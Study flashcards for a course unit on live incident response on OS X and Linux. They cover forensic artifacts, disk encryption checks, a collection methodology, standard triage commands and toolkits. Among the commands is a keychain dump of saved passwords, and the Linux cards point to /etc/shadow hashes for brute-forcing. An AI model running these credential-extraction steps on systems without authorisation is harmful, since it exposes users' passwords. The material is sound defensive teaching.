Week 6 - Live Incident Response OSX and Linux Flashcards
What are some OS X specific considerations.
OS X Specific Considerations:
OS X is Unix based, GUI or command-line driven
- sudo (and password) required to run many system commands
- However you can see many system properties without entering a password
Virtualization is popular in a OS X environment because there are so many windows based programmes. Lost of tools to do this that run well on OS X e.g.
- Parallels
- VmwareFusion
- VirtualBox
- Also OS X comes with it’s own integrated tool (bootcamp) that allows installation of other OS side by side. Always look for other partitions with own operating systems.
Although there is less support for Whole Disk Encryption (WDE) than Windows there are inbuilt tools and external tools that support this such as:
- FileVault2
- GPGDesktop
There is also native support for encrypted file containers common
- Encrypted image files built-in
- Veracrypt
What artifacts may be available in OS X? And what commmands are used to extract them?
Artifacts in OS X - same as in Windows but may be in different locations and need different commands to extract them.
Saved Passwords (Keychain). This may not give us the password of the logged in user but may give us a lot of saved passwords from various applications being used.
- security dump-keychain–d login.keychain
Check for File Vault Whole Disc Encryption (WDE)
- diskutil list - look for Unlocked Encrypted
- diskutil cs list to look for info re presence of File Vault
Logs
- /Users/<user>/Library/Logs/
These logs provide information about the activities, processes, and events related to applications and the system as it interacts with that particular user account
- /Library/Logs/ (for main library)
This is a system-wide directory that stores log files generated by applications and system processes that affect the entire system
- /var/log/ (for system logs)
is a key location that stores system logs and service-related logs. These logs are generally related to system-level activities and processes</user>
Bash history (info about typed in commands - particularly for Malware or tech savvy users)
- /Users/<user>/.bash_history</user>
/var/vm/sleepimage
- On macOS, the file located at /var/vm/sleepimage is related to the system’s hibernation or sleep process. Specifically, this file is used to store the contents of the computer’s memory (RAM) when the system goes into hibernation or a deep sleep state (may be better suited to offline investigation)
/var/vm/swapfile#
- On macOS, the /var/vm/swapfile# files are part of the system’s virtual memory management. These swap files are created by macOS when the system runs low on physical RAM (memory) and needs to temporarily move data from RAM to disk storage (virtual memory) to free up space for other processes
What is FileVault 2?
The original FileVault only encrypted the user directory and was cumbersome.
FileVault2 (from OS X.7) is like Bitlocker in windows, does full disk encryption and makes use of an extra partition to unlock the encrypted partition
What are the two ways to look for VileVault disk encryption?
- diskutil list.
Used to display a list of all disks and partitions currently connected to the system, including both internal and external drives. It provides detailed information about each disk, such as the identifier, size, partition type, and file system - diskutil cs list.
Used to display detailed information about CoreStorage volumes and their related Logical Volume Groups (LVGs). CoreStorage was introduced by Apple as a volume management system, primarily for features like FileVault 2. Basically Gives overview of the logical volumes on the system
Encrypted Disk Images - What are .dmg containers?
A DMG container (DMG stands for Disk Image file) on a Mac is a file format that acts as a virtual disk or storage container. It is commonly used for distributing software, backing up data, or creating exact replicas of physical disks. DMG files are essentially mountable volumes that can be opened in macOS and behave like an actual disk drive.
They are commonly used and a lot of software is distributed this way. They can be encrypted
Disk Images (DMG containers) can be created easily by using command line & encrypting them is easy.
Once they are encrypted it is hard to tell that they are encrypted. One way is to try to open them and seeing if tney require a password.
Once disk images are mounted - you can check for mounted encrypted disk images using command:
hdiutil info and if the image encrypted flag reads TRUE then it is encrypted.
Example OS X Live Response Data Collection Methodology
Example OS X Live Response Data Collection Methodology (same as windows - interested in same artifacts and info regardless of OS)
- Run trusted command shell from toolkit
- Document system date and time, and compare to reliable time source
- Acquire contents of physical memory
- Gather hostname, user, and operating system details
- Gather system status and environment details
- Identify users logged onto the system
- Inspect network connections and open ports
- Examine DNS queries and connected hostnames
- Examine running processes
- Correlate open ports to associated processes and programs
- Examine services and drivers
- Inspect open files
- Examine commandline history
- Identify connected shares
- Determine scheduled tasks
- Collect clipboard contents
- Determine audit policy
*** Like Windows this is an example. In some cases
there are good reasons to acquire physical memory at a
later stage. In the end you are the one that has to make that
decision
List some live response tools for OS X - Command tools.
Live Response Tools for OS X
Command line and scripting is powerful
- Can use ‘script’ command to log your actions
Gather hostname, user, and operating system details
- Date = ‘date’
- Hostname= ‘hostname’
- Current user = ‘whoami’
- OS Details Short = ‘sw_vers’
- OS Details Comprehensive = ‘system_profiler’
Identify users logged onto the system
- Logged in users = ‘w’
Inspect network connections and open ports
- Network connections = ‘netstat’
Examine DNS queries
- dscacheutil
Examine running processes
- ps/ ps–u <username></username>
Examine services and drivers
- Services=‘launchctl list’
- Loaded drivers (called kernals in OS) =‘kextstat’
Inspect open files
- lsof
Examine command line history
- Cat /Users/<user>/.bash_history</user>
Identify mapped drives and shares
- Diskutil list
Determine scheduled tasks
- launchctl list
List some live response tools for OS X - Toolkits
OS X Incident Response Toolkits
F-Response
Blacklight
MacForensicsLab
Sleuthkit
Or create your own as there are powerful command line scripting tools
What are some Linux Specific Considerations?
Linux Specific Considerations
Like OS X, linux can be GUI or command-line driven
- sudo (and password) required to run many system commands
- can run on anything (e.g servers, routers, androis is linux based, IoT etc)
- Very common in server environments
- Not as common for client workstations
Many different types or “flavors” of Linux
- so may need to look in various places for things or use different commands depending on the type.
Support for encrypted file containers is common
- Native support for Encrypted loopbacks
- Truecrypt / Veracrypt can run on linux
What artifacts might be relevant in Linux?
Artifacts in Linux:
Saved Passwords. Saved in the password file and in shadow file - contain the hashes of the passwords, so if you can extract them, you still need to brute force them to get the passwords.
- /etc/passwd
- /etc/shadow
Encryption (very common in Linux)
- Veracrypt
- Bestcrypt
- Loopbackdevices (native to linux)
Can find full disk encryption or of containsers or of user directories.
Logs
/var/log/ (usually but depends on the version of Linux)
bash history
/home/<user>/.bash_history</user>
Live Response Tools for Linux
Live Response Tools - Linux
mostly similar to macOS except slightly different ones for operating system specific commands
Command line and scripting is powerful
- Can use‘script’ command to log your actions
-Gather hostname, user, and operating system details
- Date=‘date’
- Hostname=‘hostname’
- Currentuser=‘whoami’
- OSDetailsShort=‘cat /proc/version’
- CPUinfo=‘cat /proc/cpuinfo’
- ‘uptime’
Identify users logged onto the system
- Logged in users = ‘w’
Inspect network connections and open ports
- Network connections = ‘netstat’
Examine DNS queries
- Depends on DNS installed
Examine running processes
- ps/ ps–u <username></username>
Examine services and drivers
- Services = ‘ls /etc/init.d/’
- Loadeddrivers =‘lsmod’
Inspect open files
- lsof
Examine commandline history
- cat /home/<user>/.bash_history</user>
Identify mapped drives and shares
- mount
Linux Incident Response Toolkits
Linux Incident Response Toolkits
-Helix
-The Sleuth Kit
-Building your own command line tool kit can be more flexible as can taylor to specific needs
Scripting in Linux
Scripting - scripting is very powerful on Linux
Scripting in bash is a lot like writing a Windows batch script
- Can use comments, logic and variables
Just type the commands as you would in the terminal
- mount> evidence/mounted_devices.txt (to redirect the output to a text file)
Starts the script with shell you want to use
- #!/<trusted>/sh - default system shell
- #!/<trusted>/bash– popular shell</trusted></trusted>
Usually give it an .sh extension so it is recognised
Bash (short for Bourne Again SHell) is one of the most commonly used Unix shells and command-line interpreters, especially in Linux and macOS. It’s not just an interface for running commands interactively; it’s also a scripting language, allowing users to write and execute scripts (programs) to automate tasks on Linux and other Unix-like systems.
Bash scripts are widely used for system administration, automation, and task management
